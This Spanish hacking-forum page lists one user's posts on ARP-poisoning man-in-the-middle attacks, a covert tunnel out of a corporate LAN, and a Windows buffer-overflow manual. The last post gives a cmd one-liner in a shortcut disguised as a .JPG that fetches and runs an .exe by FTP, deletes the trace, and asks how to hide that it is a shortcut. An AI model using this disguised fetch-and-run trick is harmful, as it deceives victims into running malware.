elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Temas
Páginas: [1]
1  Foros Generales / Foro Libre / MundoHacker TV en Telecinco!! en: 9 Agosto 2011, 23:45 pm
Como lo ois, mundohacker TV (creo que ya bastante conocido por todos) da el salto a la television de verdad, ¡¡¡EN TELECINCO!!!. Parece ser que van a ser emitidos 4 pilotos durante la emision del programa NosoloMusica que Telecinco emite los domingos a las 4 de la madrugada (hora española).  ;)

Parece ser que saldrán todos los que participaron en el mundohacker de globbtv, como la gente de security by default, chema alonso, Yago hansen, etc.

Si no podeis verlo por la hora os recomiendo poner el video a grabar por que la verdad es que merece la pena verlos. Y los que no seais de España podreis verlos en la pagina de telecinco, y en la oficial de mundohacker: www.mundohackertv.com

¡¡Ya era hora que echasen algo decente en telecinco!! ;-)

Un saludo
2  Seguridad Informática / Hacking / Man in the middle (Ariel) en: 31 Agosto 2010, 10:51 am
Bueno, esta iva a ser una respuesta para un tal Ariel, pero borraron su post antes de que pudiese contestarle. Realmente creo que con moverlo a hacking basico hubiese sido suficiente, pero el que manda, manda  ;D

Bueno, como ya lo tenia escrito, si a alguien le interesa lo dejo aqui
Citar
Bueno antes que nada me presento, soy Ariel y estudie una tecnicatura en sistemas, tengo 20 años y me meti de lleno en los ataques de men in the middle pero no consigo encontrar nada que me explique a fondo como realizarlos.

Yo vi a un programador senior realizar dicho ataque a un servidor especifico sabiendo su ip o dominio.

Supongamos que yo tengo el backtrack y el ipspoof tengo entendido que tendria que realizar una suplantacion de ip con la de mi maquina para uqe los datos que se envien al servidor me llegen a mi. Quisiera hacerlo, supongamos con un juego que solia jugar para practicar.
La ip de esta pagina es 201.212.0.105.
Como ya les dije, quiero estar en medio de aquellos que conecten a este servidor de ser posible.

Hola Ariel, en principio tienes mas o menos claro de lo que se trata un ataque Mitm, pero lo que se te escapa es el hecho de los enrutamientos externos.

Esta tecnica esta focalizada en ataques a SWITCHES en una red LAN, es decir, una red interna. Existe la teoria de poder realizar este mismo ataque en una red externa WAN, pero, por lo menos yo, no he tenido la suerte de comprobarlo.

La teoria de este ataque es muy sencilla a la vez que muy ingeniosa, se trata de crear una respuesta falsa a una peticion de "¿Quien tiene esta direccion IP?" que la victima no ha realizado, al ser distintas las direcciones Mac que recibe, este esta obligado a guardarla machacando la anterior. Desde ese momento el ordenador victima pensará que tu equipo es la maquina remota con la que quiere contactar.
El proceso de envio y recepcion de informacion en una red switcheada, asi como el trafico ARP, se realiza en capa 2 (MAC) y no en capa 3 (IP). Y no me refiero a descubrimiento

Ahora bien, los protocolos de enrutamiento externo (BGP) si funcionan sobre capa 3, y ahi reside el verdadero problema de realizar un envenenamiento de ARP a una red externa a la tuya, y el hecho de que delante de un servidor siempre hay un router o cortafuegos nos lo pone mas dificil aun.

Aun asi, creo que se puede y que alguien de este foro lo hizo, pero no recuerdo quien ni como.

Si quieres aprender bien esta tecnica empieza a entender a fondo el concepto:http://es.wikipedia.org/wiki/Ataque_Man-in-the-middle
Y practica con herramientas como Ettercap y Wireshark para realizar ataques entre tus propias maquinas antes de intentar destrozar un servidor externo. (y esto deberias aplicarlo tanto a esta tecnica como a todas los que hagas mas adelante).

Te dejo unos videos de youtube con el uso de ettercap, son bastante buenos y muy faciles de seguir.





Espero que le sirva a Ariel, o a alguien mas.

Un saludo
3  Comunicaciones / Hacking Mobile / SOS Proyecto Sniffer Bluetooth en: 22 Julio 2010, 18:13 pm
 :-[  Hola, estamos intentando repetir el experimento de un sniffer Bluetooth. Hemos

estado buscando en varios lugares un adaptador (BC4-EXT), sin embargo no hemos

tenido éxito.

¿Alguien sabe donde se puede conseguir uno?

-DLINK DBT 120
-Linksys USBBT100

¿Existe algún otro adaptador (actual) con estas características?

Saludos y gracias.

4  Seguridad Informática / Hacking / Puerto Arp en: 10 Abril 2010, 17:19 pm
Bueno, me explico.

Estoy colaborando en un proyecto para crear un ataque que cree un tunel entre un host de una red coorporativa local y un dispositivo externo a esta a través de un dispositvo movil.

La conexion se hace sobre un puerto especificado una vez creada la conexion entre el dispositivo movil y el host externo atacante.

El problema es que, entre los diferentes ataques que se pueden realizar con el software, intento añadir Arp poisoning, pero me surge una duda. ¿A que puerto hay que enviar los paquetes arp? XD

Parece una tonteria, pero nunca habia caido en pensar en esto, y ahora lo necesito  :P

Si alguien puede ayudarme lo agradezco. Gracias de antemano

Un saludo
5  Seguridad Informática / Hacking / [Manual] Buffer Overflow en Windows en: 8 Febrero 2010, 19:11 pm
Bueno, pues finalmente me decidí a crear un manual de Buffer Overflow en Windows. ;-)

El manual describe de forma muy simple, con imagenes y palabras poco tecnicas, la creación y explotación de un programa vulnerable a BoF.

El manual está orientado a la gente que empieza, se explica el uso de Ollydbg, la pila, creacion de un exploit, uso y como conseguir una shellcode, como introducirla...etc.

Vamos, a mi entender, incluye lo basico y esencial para comenzar a dar los primeros pasitos en este tema.

Os dejo el Indice del documento.

Citar
INTRODUCCION                  2

DEBUGGER OLLY                  3

   Ventana de Desensamblado         4
   
   Ventana de Registros            5
   
   Ventana de Stack (pila)            6

OVERFLOW (EXPLICACION)            7

CREANDO UN PROGRAMA VULNERABLE   8

HACIENDO OVERFLOW               10

ENCONTRANDO EIP               13

BUSCANDO UN RETORNO             16

CREANDO UN EXPLOIT               17

EXPLOTANDO! (FUNCION OCULTA)      18

CREANDO UNA SHELLCODE            20

MODIFICANDO EL EXPLOIT            21

EXPLOTANDO! (CON SHELLCODE)      23

DESPEDIDA Y REFERENCIAS            24

Bueno, espero que le hecheis un vistazo y me comentais que tal.

Rapidshare: http://rapidshare.com/files/354973639/Buffer_Overflow_Windows_por_Ikary.pdf
Mediafire: http://www.mediafire.com/?mnylmt2iyzn
Scribd: http://www.scribd.com/doc/27365589
SkyDriver: Buffer_Overflow_Windows_por_Ikary.pdf -Anon-
Megaupload: http://www.megaupload.com/?d=9QXSPT20 -peibol0.1-

Un saludo.
6  Seguridad Informática / Hacking / Ejecutar comandos cmd desde un Acceso Directo en Windows en: 7 Noviembre 2009, 05:44 am
Saludos

LLevo tiempo dandole vueltas al modo de ejecutar codigo desde un archivo .JPG o .TXT

E estado leyendo mucho y Googleando mas y por lo que e visto e llegado a la conclusion de que NO SE PUEDE, (o quizas no e buscado suficiente).

El hecho es que investigando ya por mi cuenta, me di cuenta que desde un acceso directo .JPG por ejemplo, se puede redirigir la ruta hacia donde queramos (incluso un .EXE) y el acceso directo sigue manteniendo su extension .JPG (ademas de la extension oculta .lnk).

Hasta el momento lo unico que e conseguido es abrir una cmd, conectarse a un servidor ftp, descargar un fichero, ejecutarlo y borrar huellas desde un Acceso Directo con extension .JPG.lnk.

El codigo que use dentro del campo Destino del AD fue este:
Código:
%windir%\system32\cmd.exe /k echo get archivo.exe>>ftp.txt && echo quit>>ftp.txt && ftp -A -s:ftp.txt 127.0.0.1 && start archivo.exe && del ftp.txt

Simplemente y a modo de prueba, el acceso directo accede al cmd.exe local, crea un fichero ftp.txt que usara el cliente ftp para conectarse, se conecta, descarga el archivo "archivo.exe" y lo ejecuta.

Ahora los problemas son:

1- El Acceso Directo debe permanecer siempre en el mismo ordenador que el archivo original. Me explico: Si metemos el acceso directo en un .rar, el winrar lo convierte a un .exe, y si enviamos el acceso directo a otra maquina, tambien la reconoce como .exe.
    Sin embargo, si metemos en un .rar el acceso directo y el archivo original, este conservará su extension .jpg.lnk. E igualmete pasa al enviarlo.

2- El Acceso Directo al crearse se le añade una etiqueta con la flechita predeterminada de Acceso Directo en la esquina inferior izquierda, dando una señal de que no es una foto original, sino algo extraño.
    E intentado con varios programas editar los atributos del archivo, pero mas tarde me di cuenta de que esa "flechita" se pone automaticamente por una entrada del registro de Windows.   
    Esta entrada se puede modificar en la maquina local, pero al pasar el fichero a otra maquina, esta le coloca la "flechita" otra vez ...logico  ;-)

3- Ademas de la "flechita", el archivo por ser un AD, se le añade un grande y claro atributo de "Acceso directo" debajo del nombre del archivo.

4- E intentado modificar las propiedades del fichero mediante programas expecificos para ello, pero como es logico, toman al Acceso directo como si fuese una cmd.exe, por lo tanto estaria modificando el archivo equivocado  >:(

Ahora mi pregunta es: ¿Hay alguna forma de modificar ese fichero para que sea (de alguna forma) invisible los atributos de Acceso directo?. ¿O alguna idea u opinion al respecto?

Bueno, desde ya, muchas gracias.

Un saludo. Ikary
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines